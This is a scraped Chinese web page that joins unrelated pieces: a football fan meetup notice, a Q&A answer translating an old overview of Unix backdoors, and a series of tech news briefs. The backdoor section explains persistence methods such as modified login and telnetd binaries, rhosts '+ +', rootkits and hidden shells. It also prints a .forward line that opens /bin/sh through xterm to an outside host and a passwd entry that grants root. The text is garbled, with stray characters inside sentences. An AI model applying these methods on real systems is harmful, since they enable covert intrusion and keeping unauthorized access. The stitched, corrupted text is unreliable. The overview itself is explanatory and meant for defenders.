后门?放课后茶会是什么组织织

上海静安聚会最终方案--晚上9点清风人家静安店,茶坊活动,静安区延安中路1109号(近延安饭店),赛前去Big Bamboo酒吧(南阳路店)看球, 静安区南阳路132号波特曼后门(近西康路),大家都会带BVB装备,球衣围巾什么的,直接认黄黑接头,这里组织者
不留联系方式,大家到时候直接去就好
发布: 20:18:20作者:多特蒙德球迷社区
上海静安聚会最终方案--晚上9点清风人家静安店,茶坊活动,静安区延安中路1109号(近延安饭店),赛前去Big Bamboo酒吧(南阳路店)看球, 静安区南阳路132号波特曼后门(近西康路),大家都会带BVB装备,球衣围巾什么的,直接认黄黑接头,这里组织者 @love_jeffed 不留联系方式,大家到时候直接去就好。
大家都在看
48小时点击榜
Copyright (C)
Inc. All Rights Reserved.
上海看看牛视网络传播有限公司 版权所有错误 - 柳橙网
欢迎访问柳橙网什么是后门程序?_百度知道
什么是后门程序?
提问者采纳
什么是后门? 从早期的计算机入侵者开始,他们就努力发展能使自己重返被入侵系统的技术或后门.本文将讨论许多常见的后门及其检测方法. 更多的焦点放在Unix系统的后门,同时讨论一些未来将会出现的Windows NT的后门. 本文将描述如何测定入侵者使用的方法这样的复杂内容和管理员如何防止入侵者重返的基础知识. 当管理员懂的一旦入侵者入侵后要制止他们是何等之难以后, 将更主动于预防第一次入侵. 本文试图涉及大量流行的初级和高级入侵者制作后门的手法, 但不会也不可能覆盖到所有可能的方法. 大多数入侵者的后门实现以下二到三个目的: 即使管理员通过改变所有密码类似的方法来提高安全性,仍然能再次侵入. 使再次侵入被发现的可能性减至最低.大多数后门设法躲过日志, 大多数情况下即使入侵者正在使用系统也无法显示他已在线. 一些情况下, 如果入侵者认为管理员可能会检测到已经安装的后门, 他们以系统的 脆弱性作为唯一的后门, 重而反复攻破机器. 这也不会引起管理员的注意. 所以在 这样的情况下,一台机器的脆弱性是它唯一未被注意的后门. 密码破解后门 这是入侵者使用的最早也是最老的方法, 它不仅可以获得对Unix机器的访问, 而且可以通过破解密码制造后门. 这就是破解口令薄弱的帐号. 以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门. 多数情况下, 入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些. 当管理员寻找口令薄弱的帐号是,畅浮扳簧殖毫帮桐爆昆 也不会发现这些密码已修改的帐号.因而管理员很难确定查封哪个帐号. Rhosts + + 后门 在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法. 用户可以轻易的改变设置而不需口令就能进入. 入侵者只要向可以访问的某用户的rhosts文件中输入&+ +&, 就可以允许任何人从任何地方无须口令便能进入这个帐号. 特别当home目录通过NFS向外共享时, 入侵者更热中于此. 这些帐号也成了入侵者再次侵入的后门. 许多人更喜欢使用Rsh, 因为它通常缺少日志能力. 许多管 理员经常检查 &+ +&, 所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名,从而不易被发现. 校验和及时间戳后门 早期,许多入侵者用自己的trojan程序替代二进制文件. 系统管理员便依*时间戳和系统校验和的程序辨别一个二进制文件是否已被改变, 如Unix里的sum程序. 入侵者又发展了使trojan文件和原文件时间戳同步的新技术. 它是这样实现的: 先将系统时钟拨回到原文件时间, 然后调整trojan文件的时间为系统时间. 一旦二进制trojan文件与原来的精确同步, 就可以把系统时间设回当前时间. sum程序是基于CRC校验, 很容易 骗过.入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序. MD5是被大多数人推荐的,MD5使用的算法目前还没人能骗过. Login后门 在Unix里,login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的原代码并修改,使它在比较输入口令与存储口令时先检查后门口令. 如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入. 这将允许入侵者进入任何帐号,甚至是root.由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的, 所以入侵者可以登录获取shell却不会暴露该帐号. 管理员注意到这种后门后, 便 用&strings&命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露.入侵者就开始加密或者更好的隐藏口令, 使strings命令失效. 所以更多的管理员是用MD5校验和检测这种后门的. Telnetd后门 当用户telnet到系统, 监听端口的inetd服务接受连接随后递给in.telnetd,由它运行login.一些入侵者知道管理员会检查login是否被修改, 就着手修改in.telnetd.在in.telnetd内部有一些对用户信息的检验, 比如用户使用了何种终端. 典型的终端设置是Xterm或者VT100.入侵者可以做这样的后门, 当终端设置为&letmein&时产生一个不要任何验证的shell. 入侵者已对某些服务作了后门, 对来自特定源端口的连接产 生一个shell . 服务后门 几乎所有网络服务曾被入侵者作过后门. finger, rsh, rexec, rlogin, ftp, 甚至inetd等等的作了的版本随处多是. 有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问.这些程序有时用刺娲□?ucp这样不用的服务,或者被加入inetd.conf作为一个新的服务.管理员应该非常注意那些服务正在运行, 并用MD5对原服务程序做校验. Cronjob后门 Unix上的Cronjob可以按时间表调度特定程序的运行. 入侵者可以加入后门shell程序使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问. 也可以查看cronjob中经常运行的合法程序,同时置入后门. 库后门 几乎所有的UNIX系统使用共享库. 共享库用于相同函数的重用而减少代码长度. 一些入侵者在象crypt.c和_crypt.c这些函数里作了后门. 象login.c这样的程序调用了crypt(),当使用后门口令时产生一个shell. 因此, 即使管理员用MD5检查login程序,仍然能产生一个后门函数.而且许多管理员并不会检查库是否被做了后门.对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验. 有一种办法是入侵者对open()和文件访问函数做后门. 后门函数读原文件但执行trojan后门程序. 所以 当MD5读这些文件时,校验和一切正常. 但当系统运行时将执行trojan版本的. 即使trojan库本身也可躲过MD5校验. 对于管理员来说有一种方法可以找到后门, 就是静态编连MD5校验程序然后运行.静态连接程序不会使用trojan共享库. 内核后门 内核是Unix工作的核心. 用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的, 所幸的是内核的后门程序还不是随手可得, 每人知道它事实上传播有多广. 文件系统后门 入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现. 入侵者的文章常是包括exploit脚本工具,后门集,sniffer日志,email的备分,原代码,等等. 有时为了防止管理员发现这么大的文件, 入侵者需要修补&ls&,&du&,&fsck&以隐匿特定的目录和文件.在很低的级别, 入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区. 因此入侵者只能用特别的工具访问这些隐藏的文件. 对于普通的 管理员来说, 很难发现这些&坏扇区&里的文件系统, 而它又确实存在. Boot块后门 在PC世界里,许多病毒藏匿与根区, 而杀病毒软件就是检查根区是否被改变. Unix下,多数管理员没有检查根区的软件, 所以一些入侵者将一些后门留在根区. 隐匿进程后门 入侵者通常想隐匿他们运行的程序. 这样的程序一般是口令破解程序和监听程序 (sniffer).有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[]使它看起来象其他进程名. 可以将sniffer程序改名类似in.syslog再执行. 因此当管理员用&ps&检查运行进程时, 出现 的是标准服务名. 可以修改库函数致使 &ps&不能显示所有进程. 可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现. 使用这个技术的一个后门例子是amod.tar.gz :
也可以修改内核隐匿进程. Rootkit 最流行的后门安装包之一是rootkit. 它很容易用web搜索器找到.从Rootkit的README里,可以找到一些典型的文件: z2 - removes entries from utmp, wtmp, and lastlog. Es - rokstar's ethernet sniffer for sun4 based kernels. Fix - try to fake checksums, install with same dates/perms/u/g. Sl - become root via a magic password sent to login. Ic - modified ifconfig to remove PROMISC flag from output. ps: - hides the processes. Ns - modified netstat to hide connections to certain machines. Ls - hides certain directories and files from being listed. du5 - hides how much space is being used on your hard drive. ls5 - hides certain files and directories from being listed. 网络通行后门 入侵者不仅想隐匿在系统里的痕迹, 而且也要隐匿他们的网络通行. 这些网络通行后门有时允许入侵者通过防火墙进行访问. 有许多网络后门程序允许入侵者建立某个端口号并不用通过普通服务就能实现访问. 因为这是通过非标准网络端口的通行, 管理员可能忽视入侵者的足迹. 这种后门通常使用TCP,UDP和ICMP, 但也可能是其他类型报文. TCP Shell 后门 入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat命令查看当前的连接状态, 那些端口在侦听, 目前连接的来龙去脉. 通常这些后门可以让入侵者躲过TCP Wrapper技术. 这些后门可以放在SMTP端口, 许多防火墙允许e-mail通行的. UDP Shell 后门 管理员经常注意TCP连接并观察其怪异情况, 而UDP Shell后门没有这样的连接, 所以netstat不能显示入侵者的访问痕迹. 许多防火墙设置成允许类似DNS的UDP报文的通行. 通常入侵者将UDP Shell放置在这个端口, 允许穿越防火墙. ICMP Shell 后门 Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一. 许多防火墙允许外界ping它内部的机器. 入侵者可以放数据入Ping的ICMP包, 在ping的机器间形成一个shell通道. 管理员也许会注意到Ping包暴风, 但除了他查看包内数据, 否者入侵者不会暴露. 加密连接 管理员可能建立一个sniffer试图某个访问的数据, 但当入侵者给网络通行后门加密后,就不可能被判定两台机器间的传输内容了. Windows NT 由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说就很难闯入Windows NT,安装后门,并从那里发起攻击. 因此你将更频繁地看到广泛的来自Unix的网络攻击. 当Windows NT提高多用户技术后, 入侵者将更频繁地利用 WindowsNT.如果这一天真的到来, 许多Unix的后门技术将移植到Windows NT上, 管理员可以等候入侵者的到来. 今天, Windows NT已经有了telnet守护程序. 通过网络通行后门, 入侵者发现在Windows NT安装它们是可行的. ( With Network Traffic backdoors, theyarevery feasible for intruders to install on Windows NT. 此处该如何翻译? :( 解决 当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀. 评估 首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之.许多商业工具用来帮助扫描和查核网络及系统的漏洞. 如果仅仅安装提供商的安全补丁的话,许多公司将大大提高安全性. MD5基准线 一个系统(安全)扫描的一个重要因素是MD5校验和基准线. MD5基准线是在黑客入侵前由干净系统建立. 一旦黑客入侵并建立了后门再建立基准线, 那么后门也被合并进去了.一些公司被入侵且系统被安置后门长达几个月.所有的系统备份多包含了后门. 当公司发现有黑客并求助备份祛除后门时, 一切努力是徒劳的, 因为他们恢复系统的同时也恢复了后门. 应该在入侵发生前作好基准线的建立. 入侵检测 随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要.以前多数入侵检测技术是基于日志型的. 最新的入侵检测系统技术(IDS)是基于实时侦听和网络通行安全分析的. 最新的IDS技术可以浏览DNS的UDP报文, 并判断是否符合DNS协议请求. 如果数据不符合协议, 就发出警告信号并抓取数据进行进一步分析. 同样的原则可以运用到ICMP包, 检查数据是否符合协议要求, 或者是否装载加密shell会话. 从CD-ROM启动 一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性.这种方法的问题是实现的费用和时间够企业面临的. 警告 由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击和安置后门技术, 安枕无忧的安全技术是没有的.请记住没有简单的防御,只有不懈的努力! ( Be aware that no defense is foolproof, and that there is no substitute for diligent attention. 此句该如何翻译? :( ) ------------------------------------------------------------------------- you may want to add: .forward Backdoor On Unix machines, placing commands into the .forward file was also a common method of regaining access. For the account ``username'' a .forward file might be constructed as follows: \username |&/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh& permutations of this method include alteration of the systems mail aliases file (most commonly located at /etc/aliases). Note that this is a simple permutation, the more advanced can run a simple script from the forward file that can take arbitrary commands via stdin (after minor preprocessing). PS: The above method is also useful gaining access a companies mailhub (assuming there is a shared a home directory FS on &nbs& the client and server). & Using smrsh can effectively negate this backdoor (although it's quite & possibly still a problem if you allow things like elm's filter or & procmail which can run programs themselves...). 你也许要增加: .forward后门 Unix下在.forward文件里放入命令是重新获得访问的常用方法. 帐户'username'的.forward可能设置如下: \username |&/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e/bin/sh& 这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).&利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或 procmail&类程序, 很有可能还有问题 ......) ( 此段的内容理解不深, 故付上英文, 请指教! ) --------------------------------------------------------------------------- 你也许能用这个&特性&做后门: 当在/etc/password里指定一个错误的uid/gid后, 大多数login(1)的实现是不能检查出这个错误的uid/gid, 而atoi(3)将设uid/gid为0, 便给了超级用户的权利. 例子: rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
其他类似问题
后门程序的相关知识
按默认排序
其他1条回答
从开放的端口侵入的程序!
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁Solidot 公告
文章提交注意事项:
请在发布文章时用HTML代码加上至少一条新闻来源的链接;原创性消息,可加入相关信息(如涉及公司的网址)的链接。有任何问题,邮件至:he..cn
注意:收到邮件乱码的用户请修改客户端的默认字体编码,从"简体中文(GB2312)"修改为"Unicode(UTF-8)"。
我们考虑举办线下活动,哪些主题你会感兴趣?
安全和黑客相关
科幻和未来
移动应用开发
[ 结果 | 投票]
评论:17 | 得票数:654
solidot新版网站常见问题,请点击查看。
发表于日 20时28分
来自纯种不存在
转基因作物的反对者经常抱怨的一个理由是物种之间的基因转移是非自然的。但农业本身就是非自然的,抛开这一点不说,科学界早已知道名为基因水平转移的过程会将基因从一个物种转移到另一个物种,这种现象不仅仅发生在植物身上,也发生在人类身上。根据发表在《Genome Biology》上的,人类至少有145个基因。
发表于日 20时06分
来自如果真的被广泛应用的话
记者无国界利用类似 GreatFire开发的技术能绕过屏蔽的被封网站镜像站。它目前共建立了的镜像站,这些网站分别被前苏联中亚三国、俄罗斯、中国、越南、古巴、沙特和阿联酋等国屏蔽,其中以被中国屏蔽网站数量最多。镜像技术利用的是云计算公司如亚马逊、微软和Google的服务器。由于它们的云服务应用广泛,政府不敢封杀,因为造成的损害大于收益。但这一假设对于中国而言未必是真的,Google苹果和微软的服务都遭到过大规模中间人攻击,封杀AWS或Azure并非是不现实的。
发表于日 19时44分
来自赶时间
瑞典检方ulian Assange。此前检方一直坚持要求在瑞典询问Assange。Assange否认了性侵指控,从2012年起就住在伦敦的厄瓜多尔大使馆。他担心如果前往瑞典会因为泄露机密文件指控而被引渡到美国。对于瑞典检方立场的改变,Assange的律师 Per Samuelson表示了欢迎。瑞典一位检察官解释说,根据诉讼时效的规定,对Assange可能采取的指控将于今年8月过期。
发表于日 18时51分
来自Rogue One Two Three...
迪士尼第一部《星球大战》独立衍生剧《Rogue One》,探索核心故事之外的角色和事件。《Rogue One》公映日期日,《星球大战7》上映1年之后。《Rogue One》这个名字可能与帝国反抗军有关,《帝国反击战》中反抗军组织了侠盗中队(Rogue squadron) ,其成员包括了天行者卢克、 Wedge Antilles和 Zev Senesca,Rogue One很可能是指Wedge Antilles。在星球大战扩展宇宙中,侠盗中队是一群星际战斗机飞行员精英组织,但迪士尼为了便于自由发挥已经宣布废弃了扩展宇宙。《Rogue One》的编剧是
,去年执导《哥斯拉》的 将是本片的导演。迪士尼还透露了《星球大战8》的公映日期:日,《星球大战新希望》上映40年周年后一天(日)。《星球大战8》由Rian Johnson执导,J.J. Abrams担任制片人。
发表于日 18时09分
来自封杀GitHub会不会引起程序员造反
10年前,尽管Linux已无处不在,但开源社区还没有像今天这样庞大。程序员开始一个开源项目通常只有一个代码托管网站可供选择:SourceForge。Google的开源大师Chris DiBona认为不能将所有鸡蛋放在一个篮子里。Google建立了它自己的开源项目托管网站Google Code。十年后的今天,Google Code的消息。原因是GitHub,绝大多数的开源项目如今都托管在GitHub上。但这并没有引起所有鸡蛋放在一个篮子的担忧,因为GitHub使用的版本系统是Linus Torvalds为Linux内核开发的Git。Git允许任何人下载一份内核源代码的拷贝,然后在本地修改和开发,如果愿意的话他们可以将修改后的代码上传到中心仓库。GitHub让任何开源项目都可以像Linux内核那样开发。Google、Facebook、Twitter甚至微软都将自己的开源项目托管在GitHub上。开发者仍然是在自己的机器上开发,但GitHub成为了他们共同的网站,他们都聚集在那里。
发表于日 17时23分
来自超人是不管草人的
研究人员在《自然》上发表,人类胚胎、精子或卵子细胞的基因。基因编辑技术如CRISPR和锌指核酸酶简化了科学家删除、增加或改变特定基因的工作。这些工具可用于开发更好的动物疾病模型,更容易的研究个别基因的作用。它们也具有潜力修正患者的基因突变。科学家还用这些工具创造了基因修改过的猴子,而有流言称部分研究人员甚至尝试。五名研究人员在《自然》上指出这是不安全和不道德的。他们呼吁在科学家对此类人类基因编辑实验公开讨论其安全性和伦理后果前暂停相关研究。
发表于日 16时07分
来自要不要感动到流泪
这是一则温馨的故事:是一个志愿者社区,专注于为失去手或手臂的儿童或成年人提供免费的3D打印生物义肢。中佛罗里达大学的Albert Manero是其中一位志愿者,他和微软合作为一名7岁大的残疾儿童Alex。义肢的设计源自Gyrobot的。在义肢制造完成之后,Manero和微软合作寻找地球上最有资格将生物手臂送给Alex的人:托尼·斯塔克 aka 小罗伯特·唐尼。Alex是一名狂热的钢铁侠粉丝。上面的视频(YouTube)就是小罗伯特·唐尼与Alex见面的过程,Alex的生物手臂连钢铁侠也羡慕不已。
发表于日 15时49分
来自中国没受影响
3月12日,印度一家ISP的路由泄露导致Google。印度ISP Hathway通过巴蒂电信(Bharti Airtel)向全世界广播了它的内部路由表,导致网络流量没有正确路由。Hathway的边界路由器不正确的广播了属于Google的300多个网络前缀的路由数据,错误路由数据经过巴蒂电信传播到了骨干网,许多国家的ISP接受了错误路由,导致大批用户受到影响。Hathway有Google的内部路由是因为它是Google的对等网络服务商,帮助加速Google云访问,定向流量到最近的Google数据中心,这一对等网络是一个私有的网络链接。
发表于日 15时24分
来自没有桂树
中国地质大学、中科院和澳门科技大学的研究人员在《科学》上,报告了嫦娥三号任务的。嫦娥三号登月探测器和玉兔号月球车于日在月球表面着陆,这是1976年以来第一次有探测器登陆月球。着陆地点是一个大约3000万到8000万历史的陨石坑,玉兔号携带了摄像机和探地雷达,它总共行进了114米就因为机械故障而停了下来。探地雷达能探测到月表下面500米。研究人员根据探地雷达的数据发现,月球表面至少有9个明显不同的层次:最上面几米是月尘或陨石冲击而移动的石头,10米下方开始转变到火山玄武岩,形成于月球早期的风化层,熔岩岩浆流,等等。研究显示,月球过去曾经历过复杂的火山地质活动。
发表于日 12时55分
来自最后的独裁者是AI
根据国内媒体,百度CEO、全国政协委员李彦宏提出的国家级人工智能“中国大脑”建议似乎真的引起了部分军方人士的注意。李彦宏的“中国大脑”或可称为百度人工智能计划“百度大脑”的扩大版,李彦宏,“我们现在只有一个‘百度大脑’的项目,其中只包含几万台的服务器,所以希望国家可以搞一个几十万台服务器的技术架构。这样,当我们要想做更大规模实验时,就可以在国家提供的平台上来做,也可以以更低的成本去做更多的创新。”他的“中国大脑”计划将聚焦智能人机交互、大数据分析预测、自动驾驶、智能医疗诊断、智能无人飞机、军事和民用机器人技术等方面。一位军方的专家说,“中国应集中优势资源用在可以大力提升我国国力的重点领域与关键环节,中国大脑计划如由国家层面战略布局,必将实现人工智能技术的重大突破。”
发表于日 12时06分
来自要不要付费,反正你国连Google也访问不了
在开放的无线网络中上网,如果所有流量都经过VPN加密,那么安全性显然要好得多。出于安全性的考虑Google可能会为Android,其预兆是:Nexus 6手机最近的更新加入了一个叫Google Connectivity Services的应用,它会弹出一个标记为 Google VPN的面板。但启用该应用目前还没有任何效果,这项服务有可能会在不久的未来推出。
发表于日 11时36分
来自越来越像中国
中国的空气污染严重,但印度某些城市的污染更严重,美国驻外使馆在中国设立空气检测站之后也开始在印度等国和地区实时检测空气污染。印度政府的应对之策则似曾相识。《纽约时报》,印度的一项新政策要求将空气污染实时监测数据先发送给中央政府领导下的中央污染控制管理委员会进行验证。批评者认为这是试图封锁相关的信息,而不是努力采取措施改善空气质量。印度负责环境事务的部门发表声明辩解说,这一变化旨在确保监测德里空气的许多政府部门“遵循统一的校准规范和验证程序”。世界卫生组织称,印度由慢性呼吸系统疾病导致的死亡人数居世界首位,哮喘导致的死亡人数也高于其他国家。空气污染还会促成慢性和急性心脏病,这是印度人的主要死亡原因。
发表于日 11时12分
来自不像Google Reader没几个人怀念
GitHub笑到了最后。Google开源博客,其开源项目托管服务Google Code将于日关闭。从日起,Google Code将不能再创建新项目,8月24日整个网站进入只读模式,日服务关闭,但2016年的其余时间仍然会开放包含软件源代码、问题和维基的tarball包下载。在Google Code建有项目的开发者可以使用将其项目迁移到GitHub,同时自动将项目使用的 Subversion或 Mercurial版本控制系统转换为Git。
发表于日 10时32分
来自死神来了
著名幽默讽刺作家、奇幻小说《碟形世界》系列的创造者特里·普拉切特爵士(Sir Terry Pratchett),享年66岁。特里爵士一生写了70多本书,其中一半属于《碟形世界(Discworld)》系列,他的著作被翻译成37种语言(包括中文),总销量7000万册。特里·普拉切特八年前被诊断患有阿尔兹罕默氏病,他形容其感受是“一种挫败感”,2009年他被女王授予爵士爵位,去年他发表了最后一本小说,并取消了出席公众活动的计划。
发表于日 09时37分
写道 "近日有用户中国联通所推出的被 报告为恶意软件。Google 称该应用“可能被用于监控”,并建议“立即卸载”。Google 的应用验证功能自 Android 4.2(Jelly Bean)开始引入,主要防范用户自非 Play 商店渠道安装的恶意应用,但这一功能一直以来被认为形同鸡肋,。这次事件似乎表面 Google 并未放弃其在提升 Android 设备安全性上的努力,然而应用验证功能要求设备必须安装有 Google 框架,在中国特色的网络环境下大部分中国用户依旧难以享受到应有的保护。"
发表于日 20时40分
来自黄金太俗气了只有土豪才戴
如果Apple Watch一年能销售2000万到3000万,这对统治手表市场的瑞士手表业意味着什么?很可能意味着它们。高端的瑞士手表是身份的象征,而如今Apple Watch也有高端的18K黄金手表,苹果是否会吞食瑞士手表的市场?瑞士手表制造商Swatch的联合创始人Elmar Mock认为会。瑞士在2014年出口了大约2860万块手表,没有一块是智能手表。分析师估计Apple Watch可能导致Swatch集团年收入下降6%,目前至少有三家瑞士手表公司计划制造智能手表,其中包括了Swatch。也有人认为Apple Watch不会对瑞士手表构成太大的冲击。
发表于日 20时06分
来自能运行Wine吗
一位来自上海的发起了项目,旨在让用户能在Windows上不做任何修改的跑Linux二进制文件。自由软件社区有一个类似的项目叫,但需要重新编译才能将Linux或BSD上的软件运行在Windows上。Foreign LINUX绕过了这一对普通用户来说过于困难的过程,它是一个动态二进制翻译器和Linux系统调用接口模拟器,目前它处于早期开发阶段,能运行的Linux工具包括bash、vim、nano、python、gcc等。
发表于日 19时46分
来自用苹果地图的路过
开源Android社区ROM CyanogenMod的商业版本叫Cyanogen OS,而Cyanogen OS。开发CyanogenMod的公司Cyanogen正致力于对Android操作系统去Google化,邮件应用只是整个过程的一部分。Android上的Google核心应用包括了邮件以及地图。Cyanogen OS的邮件应用由 Boxer开发,也许它下一步可以用诺基亚的地图去替代Google地图。Cyanogen OS 12将是基于Android 5.0 Lollipop,预计将在未来几周推出。
发表于日 19时26分
来自被分析得很彻底
设计破坏伊朗核工厂核浓缩设备的Stuxnet蠕虫被认为是美国和以色列联合开发的成果,旨在阻止或放慢伊朗核武器计划的进度。美国和以色列的联合行动代号为Olympic Games。这些信息最早是由《纽约时报》记者David Sanger根据消息来源披露的。《华盛顿邮报》周三,美国联邦检察官正在调查退休海军陆战队将军James E. "Hoss" Cartwright 是否向Sanger泄露了高度机密的信息。这项泄密犯罪调查美国和以色列确实是Stuxnet的作者。
发表于日 18时45分
AtScript是微软Typescript语言的扩展,由Google的AtScript团队开发,用于构建 AngularJS 2.0 Web开发框架。AngularJS是流行的Web应用开发框架之一。前几天,Google的Angular团队和微软的Typescript团队在官方博客上,AtScript的开发被终止,其特性将在Typescript实现,而AngularJS 2.0将在微软的开源静态类型脚本语言上。重写的AngularJS 2.0因为破坏了向后兼容性而引发了争议。}

我要回帖

更多关于 结缔组织病是什么 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信